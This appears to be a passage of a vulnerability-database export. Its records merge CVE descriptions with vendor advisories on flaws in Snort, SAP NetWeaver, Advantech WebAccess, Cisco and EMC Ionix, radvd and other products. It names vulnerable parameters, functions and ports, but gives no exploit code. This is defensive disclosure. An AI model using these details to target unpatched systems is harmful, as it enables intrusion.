var-200702-0378 Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote attackers to execute arbitrary code via crafted SMB traffic. Snort IDS and Sourcefire Intrusion Sensor are prone to a stack-based buffer-overflow vulnerability because the network intrusion detection (NID) systems fail to handle specially crafted 'DCE' and 'RPC' network packets. An attacker can exploit this issue to execute malicious code in the context of the user running the affected application. Failed attempts will likely cause these applications to crash. The software provides functions such as packet sniffing, packet analysis, and packet inspection. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA07-050A Sourcefire Snort DCE/RPC Preprocessor Buffer Overflow Original release date: February 19, 2007 Last revised: -- Source: US-CERT Systems Affected * Snort 2.6.1, 2.6.1.1, and 2.6.1.2 * Snort 2.7.0 beta 1 * Sourcefire Intrusion Sensors version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 * Sourcefire Intrusion Sensors for Crossbeam version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 Other products that use Snort or Snort components may be affected. I. The DCE/RPC preprocessor reassembles fragmented SMB and DCE/RPC traffic before passing data to the Snort rules. The vulnerable code does not properly reassemble certain types of SMB and DCE/RPC packets. An attacker could exploit this vulnerability by sending a specially crafted TCP packet to a host or network monitored by Snort. The DCE/RPC preprocessor is enabled by default, and it is not necessary for an attacker to complete a TCP handshake. US-CERT is tracking this vulnerability as VU#196240. This vulnerability has been assigned CVE number CVE-2006-5276. Further information is available in advisories from Sourcefire and ISS. II. III. Solution Upgrade Snort 2.6.1.3 is available from the Snort download site. Sourcefire customers should visit the Sourcefire Support Login site. Disable the DCE/RPC Preprocessor To disable the DCE/RPC preprocessor, comment out the line that loads the preprocessor in the Snort configuration file (typically /etc/snort.conf on UNIX and Linux systems): [/etc/snort.conf] ... #preprocessor dcerpc... Restart Snort for the change to take effect. Disabling the preprocessor will prevent Snort from reassembling fragmented SMB and DCE/RPC packets. This may allow attacks to evade the IDS. IV. References * US-CERT Vulnerability Note VU#196240 - <http://www.kb.cert.org/vuls/id/196240> * Sourcefire Advisory 2007-02-19 - <http://www.snort.org/docs/advisory-2007-02-19.html> * Sourcefire Support Login - <https://support.sourcefire.com/> * Sourcefire Snort Release Notes for 2.6.1.3 - <http://www.snort.org/docs/release_notes/release_notes_2613.txt> * Snort downloads - <http://www.snort.org/dl/> * DCE/RPC Preprocessor - <http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html> * IBM Internet Security Systems Protection Advisory - <http://iss.net/threats/257.html> * CVE-2006-5276 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5276> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA07-050A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA07-050A Feedback VU#196240" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2007 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History February 19, 2007: Initial Release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRdop4+xOF3G+ig+rAQKdtAgAhQY66LRfVlNkH30Q5RI0gIo5Vhu14yDP qulLEyzjDhC7gDHWBGQYdE9eCy9Yf3P4BfKJS0766he/7CFn+BaDs7ohnXaynHQq +kMYNBMBg2RbrGKfOGRLHc0P6X1tSP3w45IppjOv9Yo5SUVDCa7beZWURCIKZyp6 OuYXtnpiGNctHgeU56US0sfuKj8qP7KOd9pCDRDQRhJ3UUd9wDpXee66HBxchh+w RSIQiMxisOX9mMYBW3z4DM/lb7PxXoa2Q7DwjM1NIOe/0tAObCOvF4uYhOLCVyNg +EbcN9123V0PW95FITlHXvJU6K8srnnK+Fhpfyi4vg5bYeEF2WiUrg== =T7v8 -----END PGP SIGNATURE----- . February 19, 2007 Summary: Sourcefire has learned of a remotely exploitable vulnerability in the Snort DCE/RPC preprocessor. Sourcefire has prepared updates for Snort open-source software to address this issue. Mitigating Factors: Users who have disabled the DCE/RPC preprocessor are not vulnerable. Recommended Actions: * Open-source Snort 2.6.1.x users are advised to upgrade to Snort 2.6.1.3 (or later) immediately. * Open-source Snort 2.7 beta users are advised to mitigate this issue by disabling the DCE/RPC preprocessor. This issue will be resolved in Snort 2.7 beta 2. Workarounds: Snort users who cannot upgrade immediately are advised to disable the DCE/RPC preprocessor by removing the DCE/RPC preprocessor directives from snort.conf and restarting Snort. However, be advised that disabling the DCE/RPC preprocessor reduces detection capabilities for attacks in DCE/RPC traffic. After upgrading, customers should reenable the DCE/RPC preprocessor. Detecting Attacks Against This Vulnerability: Sourcefire will be releasing a rule pack that provides detection for attacks against this vulnerability. Has Sourcefire received any reports that this vulnerability has been exploited? - No. Sourcefire has not received any reports that this vulnerability has been exploited. Acknowledgments: Sourcefire would like to thank Neel Mehta from IBM X-Force for reporting this issue and working with us to resolve it. ------------------------------------------------------------------------- Take Surveys. Earn Cash. Influence the Future of IT Join SourceForge.net's Techsay panel and you'll get the chance to share your opinions on IT & business topics through brief surveys-and earn cash http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV _______________________________________________ Snort-announce mailing list Snort-announce@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/snort-announce . Resolution ========== All Snort users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/snort-2.6.1.3" References ========== [ 1 ] CVE-2006-5276 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
var-201112-0297 Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user's browser when viewed maliciously. When using transaction \"sa38\", RSTXSCRP reports an error and can be exploited to inject any UNC path through the \"File Name\" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \"<STRING>\" parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability, an html-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions
var-201407-0233 Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webdact.ocx ActiveX Control. The control does not check the length of an attacker-supplied ProjectName string before copying it into a fixed length buffer on the stack. This could allow an attacker to execute arbitrary code in the context of the browser process. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess webvact.ocx, dvs.ocx and webdact.ocx ActiveX controls fail to properly handle long-length named ProjectName, SetParameter, NodeName, CCDParameter, SetColor, AlarmImage, GetParameter, GetColor, ServerResponse, SetBaud and IPAddress parameters, and attackers can build malicious A WEB page that entice a user to access, can crash an application or execute arbitrary code. Advantech WebAccess is prone to multiple remote stack-based buffer-overflow vulnerabilities. Failed exploit attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
var-201809-0087 WECON LeviStudio Versions 1.8.29 and 1.8.44 have multiple stack-based buffer overflow vulnerabilities that can be exploited when the application processes specially crafted project files. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Wecon LeviStudioU. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of the UserMgr.xml file. When parsing the GroupList ID element, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code under the context of Administrator. WECON LeviStudio is a set of human interface programming software from WECON, China
var-202411-1458 Cross Site Scripting vulnerability in DLink DWR 2000M 5G CPE With Wifi 6 Ax1800 and Dlink DWR 5G CPE DWR-2000M_1.34ME allows a local attacker to obtain sensitive information via the file upload feature of the VPN configuration module. D-Link Systems, Inc. of dwr-2000m Firmware has a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. D-Link DWR-2000M is a wireless router from D-Link, a Chinese company. D-Link DWR-2000M has a cross-site scripting vulnerability. The vulnerability is caused by the lack of effective filtering and escaping of user-provided data by the application
var-201109-0089 Multiple unspecified vulnerabilities in Cisco Unified Service Monitor before 8.6, as used in Unified Operations Manager before 8.6 and CiscoWorks LAN Management Solution 3.x and 4.x before 4.1; and multiple EMC Ionix products including Application Connectivity Monitor (Ionix ACM) 2.3 and earlier, Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) 3.2.0.2 and earlier, IP Management Suite (Ionix IP) 8.1.1.1 and earlier, and other Ionix products; allow remote attackers to execute arbitrary code via crafted packets to TCP port 9002, aka Bug IDs CSCtn42961 and CSCtn64922, related to a buffer overflow. Cisco Unified Operations Manager and CiscoWorks LAN Management Solution Used in Cisco Unified Service Monitor Contains a vulnerability that allows arbitrary code execution. The problem is Bug ID CSCtn42961 and CSCtn64922 It is a problem.Skillfully crafted by a third party TCP port 9002 Arbitrary code could be executed via packets. Authentication is not required to exploit this vulnerability.The flaw exists within the brstart.exe service which listens by default on TCP port 9002. When handling an add_dm request the process uses a user provided value to allocate a buffer then blindly copies user supplied data into a fixed-length buffer on the heap. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the casuser user. Multiple EMC Ionix applications are prone to a buffer-overflow vulnerability. Successful exploits will result in the complete compromise of affected applications. Failed exploit attempts will result in a denial-of-service condition. The following applications are affected. Ionix Application Connectivity Monitor (Ionix ACM) version 2.3 and prior Ionix Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) version 3.2.0.2 and prior Ionix IP Management Suite (Ionix IP) version 8.1.1.1 and prior Ionix IPv6 Management Suite (Ionix IPv6) version 2.0.2 and prior Ionix MPLS Management Suite (Ionix MPLS) version 4.0.0 and prior Ionix Multicast Manager (Ionix MCAST) version 2.1 and prior Ionix Network Protocol Management Suite version (Ionix NPM) 3.1 and prior Ionix Optical Transport Management Suite version (Ionix OTM) 5.1 and prior Ionix Server Manager (EISM) version 3.0 and prior Ionix Service Assurance Management Suite (Ionix SAM) version 8.1.0.6 and prior Ionix Storage Insight for Availability Suite (Ionix SIA) version 2.3.1 and prior Ionix VoIP Availability Management Suite (Ionix VoIP AM) version 4.0.0.3 and prior. Details ======= CiscoWorks LAN Management Solution is an integrated suite of management functions that simplifies the configuration, administration, monitoring, and troubleshooting of a network. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2011-029: Buffer overflow vulnerability in multiple EMC Ionix products. EMC will communicate the fixes for all other affected products as they become available. Regularly check EMC Knowledgebase solution emc274245 for the status of these fixes. Link to remedies: Registered EMC Powerlink customers can download software from Powerlink. For EMC Ionix Software, navigate in Powerlink to Home > Support > Software Downloads and Licensing > Downloads E-I Because the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a software download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045. Credits: EMC would like to thank Abdul Aziz Hariri working with TippingPoint's Zero Day Initiative (http://www.zerodayinitiative.com) for reporting this issue. For explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC Corporation distributes EMC Security Advisories in order to bring to the attention of users of the affected EMC products important security information. EMC recommends all users determine the applicability of this information to their individual situations and take appropriate action. In no event shall EMC or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Cisco has released free software updates that address these vulnerabilities. There are no workarounds available to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml Note: CiscoWorks LAN Management Solution is also affected by these vulnerabilities. The Software Update page displays the licensing and software version. They provides a way to continuously monitor active calls supported by the Cisco Unified Communications System. Both of these vulnerabilities are documented in Cisco bug ID CSCtn42961 ( registered customers only) and have been assigned CVE ID CVE-2011-2738. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCtn42961 - Cisco Unified Service Monitor Remote Code Execution CVSS Base Score - 10 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of these vulnerabilities could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Mitigations that can be deployed on Cisco devices within the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory, which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-201100914-cusm-lms.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were reported to Cisco by ZDI and discovered by AbdulAziz Hariri. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +----------------------------------------+ | Revision | | Initial | | 1.0 | 2011-September-14 | public | | | | release | +----------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (SunOS) iFcDBQFOb9w/QXnnBKKRMNARCBomAP9pCiRwCB8z3oe3IWB2XXNzeaQxAwoq0gQ4 6znwu3lLSAD/Y6o+u8AofSMxkj3THWIdpbjVXKQXMal/BhxDhN5fsI8= =Ybok -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
var-201908-0863 Rockwell Automation Arena Simulation Software versions 16.00.00 and earlier contain a USE AFTER FREE CWE-416. A maliciously crafted Arena file opened by an unsuspecting user may result in the application crashing or the execution of arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of DOE files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. 9502-Ax) 16.00.00 and earlier versions have resource management error vulnerabilities
var-201402-0027 The process_ra function in the router advertisement daemon (radvd) before 1.8.2 allows remote attackers to cause a denial of service (stack-based buffer over-read and crash) via unspecified vectors. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. A security vulnerability exists in the 'process_ra' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. If used in unicast mode, a remote attacker could cause radvd outages, resulting in a denial of service. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2323-1 security@debian.org http://www.debian.org/security/ Yves-Alexis Perez October 26, 2011 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : radvd Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605 Debian Bug : 644614 Multiple security issues were discovered by Vasiliy Kulikov in radvd, an IPv6 Router Advertisement daemon: CVE-2011-3602 set_interface_var() function doesn't check the interface name, which is chosen by an unprivileged user. CVE-2011-3604 process_ra() function lacks multiple buffer length checks which could lead to memory reads outside the stack, causing a crash of the daemon. CVE-2011-3605 process_rs() function calls mdelay() (a function to wait for a defined time) unconditionnally when running in unicast-only mode. As this call is in the main thread, that means all request processing is delayed (for a time up to MAX_RA_DELAY_TIME, 500 ms by default). Note: upstream and Debian default is to use anycast mode. For the oldstable distribution (lenny), this problem has been fixed in version 1:1.1-3.1. For the stable distribution (squeeze), this problem has been fixed in version 1:1.6-1.1. For the testing distribution (wheezy), this problem has been fixed in version 1:1.8-1.2. For the unstable distribution (sid), this problem has been fixed in version 1:1.8-1.2. We recommend that you upgrade your radvd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk6q2QcACgkQXm3vHE4uylqlEQCgpdFwHzpKLF6KHlJs4y/ykeo/ oEYAniJXFaff25pMtXzM6Ovu8zslZm7H =VfHu -----END PGP SIGNATURE-----
var-201402-0028 The process_rs function in the router advertisement daemon (radvd) before 1.8.2, when UnicastOnly is enabled, allows remote attackers to cause a denial of service (temporary service hang) via a large number of ND_ROUTER_SOLICIT requests. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. An input validation vulnerability exists in the 'process_rs' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. (CVE-2011-3605) Update instructions: The problem can be corrected by 